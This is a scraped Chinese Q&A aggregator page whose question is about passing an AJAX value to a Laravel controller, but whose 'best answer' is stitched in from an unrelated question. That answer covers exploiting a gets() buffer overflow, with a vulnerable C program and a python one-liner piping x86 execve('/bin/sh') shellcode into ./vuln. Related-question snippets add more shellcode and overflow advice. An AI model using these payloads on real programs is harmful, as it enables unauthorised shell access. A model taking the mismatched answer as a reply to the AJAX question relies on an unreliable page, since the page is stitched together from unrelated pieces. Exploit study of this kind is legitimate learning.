首页 \ 问答 \ 无法将值从Ajax传递给控制器(Can not pass value from Ajax to controller)

无法将值从Ajax传递给控制器(Can not pass value from Ajax to controller)

 我的AJAX：  
   $.ajax({
        url: '{{ URL::to('dashboard') }}',
        type: 'GET',
        data: { cid: val },
        dataType:'JSON',
        success: function(result) {
        },
        error: function(){
            $('#status-msg').addClass('alert alert-danger');
            $('#status-msg').text('Fejl!!');
        }
    });   
 
 我的路线：  
 我的控制器：  
    public function dashboard(){
        if (Request::ajax()){
            $cid = Input::get('cid');
            var_dump(json_encode($cid));
        } else {
            echo "XX";
        }      
    }
 
 cid没有传递给控制器，请求AJAX不起作用。 

My AJAX:  
   $.ajax({
        url: '{{ URL::to('dashboard') }}',
        type: 'GET',
        data: { cid: val },
        dataType:'JSON',
        success: function(result) {
        },
        error: function(){
            $('#status-msg').addClass('alert alert-danger');
            $('#status-msg').text('Fejl!!');
        }
    });   
 
My Route: 
My Controller: 
    public function dashboard(){
        if (Request::ajax()){
            $cid = Input::get('cid');
            var_dump(json_encode($cid));
        } else {
            echo "XX";
        }      
    }
 
The cid is not passing to controller, the request AJAX is not working.

原文：https://stackoverflow.com/questions/28177776

更新时间：2023-07-11 14:07

最满意答案

 当shellcode execve（/ bin / sh）执行时，它没有连接的标准输入（因为GETS）并将终止。  
 解决方案是关闭stdin描述符，在执行/ bin / sh之前重新打开/ dev / tty。  
#include <unistd.h>
#include <stdio.h>
#include <sys/fcntl.h>

int main(void) {
    char buf[50];
    gets(buf);
    printf("Yo %s\n", buf);
    close(0);
    open("/dev/tty", O_RDWR | O_NOCTTY);
    execve ("/bin/sh", NULL, NULL);
}
 
 相关回答： execve（“/ bin / sh”，0,0）; 在管道里  
 也可以使用执行有效载荷  
( python -c "print 'A'*62 + '\x35\x56\x55\x56' + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"; cat ) | ./vuln

When the shellcode execve(/bin/sh) executes, it has no connected standard input (because of GETS) and will terminate. 
The solution is to close stdin descriptor, reopen /dev/tty before executing /bin/sh. 
#include <unistd.h>
#include <stdio.h>
#include <sys/fcntl.h>

int main(void) {
    char buf[50];
    gets(buf);
    printf("Yo %s\n", buf);
    close(0);
    open("/dev/tty", O_RDWR | O_NOCTTY);
    execve ("/bin/sh", NULL, NULL);
}
 
Related answer: execve("/bin/sh", 0, 0); in a pipe 
It is also possible to execute the payload by using 
( python -c "print 'A'*62 + '\x35\x56\x55\x56' + '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'"; cat ) | ./vuln

相关问答

shellcode是什么，它有什么用途？编程语言？还是[2023-02-11]

Shellcode实际是一段代码，是用来发送到服务器利用特定漏洞的代码，一般可以获取权限。Shellcode是溢出程序和蠕虫病毒的核心，提到它自然就会和漏洞联想在一起，毕竟Shellcode只对没有打补丁的主机有用武之地。中文名：填充数据外文名： shellcode 类型：漏洞代码平台：互联网
怎么杀这病毒 Suspicious.ShellCode.Exploit ？~！~！~[2024-01-07]

首先直接删是治标不治本的，用不了几天还会被挂的看源文件也是没有用的，可能写在你的其他包含文件里或者JS文件或者数据库里！下面讲被挂马后的一般查马和解决方法。网页中被插入Js/iframe的可能性的途径：虽然问题简单，但详细说起来从服务器、传输过程和客户端3个层次来分析。 1、就服务器而言存在的可能： (1) 直接修改网页插入，现象是网页被改动了。 (2) 通过ISAPI Filter插入，现象是出现了陌生的ISAPI加载项。 (3) 通过IIS的脚注插入，现象是脚注设置被启用了。 (4) 通过网络TD ...
谁能解释这个汇编代码(How can I explain the behavior of the following shellcode exploit?)[2023-09-09]

int是用于触发软件中断的操作码。软件中断编号（从0到255）并由内核处理。在Linux系统上，中断128（0x80）是系统调用的常规入口点。内核需要寄存器中的系统调用参数; 特别是，％eax寄存器识别我们正在谈论的系统调用。将％ebx设置为0 计算％ebx + 23并将结果存储在％eax中（操作码是lea作为“加载有效地址”但不涉及内存访问;这只是添加的一种狡猾的方式）。系统调用。％eax包含23，这意味着系统调用是setuid 。该系统调用使用一个参数（目标UID），可在％ebx中找到，该 ...
执行shellcode分段错误[关闭](Executing shellcode segmentation fault [closed])[2022-03-15]

您忘了设置edx因此它包含上次使用它的C代码，并且不太可能是有效的环境指针。在独立代码中，由于程序的初始启动状态， edx恰好为零。如果你使用strace你可以看到execve返回-EFAULT ，然后执行继续通过你的代码进入垃圾，然后真正的段错误。您可以修复shellcode，例如： char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x8 ...
写缓冲区溢出漏洞 - 如何找出shellcode的地址？(Write buffer overflow exploit — how to figure out the address of the shellcode?)[2021-08-15]

您通常不需要“弄清楚”shellcode的地址。使用set字符串溢出缓冲区并计算出偏移量。说 AAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC 其中BBBB覆盖EIP（下一个指令地址），并且CCCC在ESP寄存器指向的位置下降。您需要找到一个可以继续在shellcode上执行的指令，您可以在CCCC开始的位置插入该指令。比如JMP ESP指令。这需要是静态的（例如，没有ASLR），并且地址不应包含任何“坏”字符，例如可能终止缓冲区的\x00 。所以过程是：缓冲区溢出 ...
漏洞利用开发 - GETS和Shellcode(Exploit Development - GETS and Shellcode)[2023-09-06]

当shellcode execve（/ bin / sh）执行时，它没有连接的标准输入（因为GETS）并将终止。解决方案是关闭stdin描述符，在执行/ bin / sh之前重新打开/ dev / tty。 #include #include #include int main(void) { char buf[50]; gets(buf); printf("Yo %s\n", buf); close( ...
execve shellcode linux分段错误(execve shellcode linux segmentation fault)[2022-04-02]

您的问题是.text部分默认情况下不可写。最简单的方法是将代码放入一个标记为可写的新自定义部分。在asm文件的顶部添加以下行： section .shellcode progbits alloc exec write align=16 您也可以将-N开关传递给链接器。或者，您可以重写shellcode，以便它使用堆栈来创建参数。 Your problem is that the .text section is not writable by default. The easiest thing ...
shellcode中的Syscall将无法运行(Syscall inside shellcode won't run)[2022-01-11]

问题是mov al,0x3b 。你忘了将顶部位归零，所以如果它们不是零，你将不会执行execve系统调用，而是执行其他操作。简单的调试应该指出这一点。解决方案很简单：只需在此之前插入xor eax, eax 。此外，由于您将返回地址附加到您的漏洞利用，因此该字符串将不再为零终止。通过在运行时使用例如mov [rdi + 7], al存储零也很容易修复，就在你清除了eax 。完整的漏洞可能看起来像： ruby -e 'print "\x90" * 98 + "\xeb\x18\x5f\x31\xc ...
shellcode中的无限循环(infinite loop in shellcode)[2023-03-20]

似乎第一个int 0x80返回eax的返回值。之后你将al设置为1 ，但不是eax 。因此，您应该将代码更改为： mov eax,1 xor ebx,ebx int 0x80 It seems that first int 0x80 returns the return value in eax. After that you set al to 1, but not eax. So you should change your code to: mov eax,1 xor ebx,ebx int 0 ...
python'decode'没有属性shellcode(python 'decode' has no attribute shellcode)[2021-10-06]

在python3中，sys.argv [1]将是一个str（unicode，在python2中），因此无需解码。一个简单的测试 - arg_type.py： import sys shellcode = sys.argv[1] print(type(shellcode)) 在python3和python 2中运行 $ python3.4 arg_type.py 'é' $ python2.7 arg_type.py 'é' 请注意，在python ...

AJAX问题

为什么AJAX调用不了Servlet控制器

ajax数据安全的问题

第四章 Controller接口控制器详解（1）——跟着开涛学SpringMVC

第四章 Controller接口控制器详解（4）——跟着开涛学SpringMVC

第四章 Controller接口控制器详解（5）——跟着开涛学SpringMVC

第四章 Controller接口控制器详解（6）——跟着开涛学SpringMVC

第四章 Controller接口控制器详解（2）——跟着开涛学SpringMVC

第四章 Controller接口控制器详解（3）——跟着开涛学SpringMVC

spring mvc 页面传值到controller

无法将值从Ajax传递给控制器(Can not pass value from Ajax to controller)

最满意答案

相关问答

shellcode是什么，它有什么用途？编程语言？还是[2023-02-11]

怎么杀这病毒 Suspicious.ShellCode.Exploit ？~！~！~[2024-01-07]

谁能解释这个汇编代码(How can I explain the behavior of the following shellcode exploit?)[2023-09-09]

执行shellcode分段错误[关闭](Executing shellcode segmentation fault [closed])[2022-03-15]

写缓冲区溢出漏洞 - 如何找出shellcode的地址？(Write buffer overflow exploit — how to figure out the address of the shellcode?)[2021-08-15]

漏洞利用开发 - GETS和Shellcode(Exploit Development - GETS and Shellcode)[2023-09-06]

execve shellcode linux分段错误(execve shellcode linux segmentation fault)[2022-04-02]

shellcode中的Syscall将无法运行(Syscall inside shellcode won't run)[2022-01-11]

shellcode中的无限循环(infinite loop in shellcode)[2023-03-20]

python'decode'没有属性shellcode(python 'decode' has no attribute shellcode)[2021-10-06]

相关文章

最新问答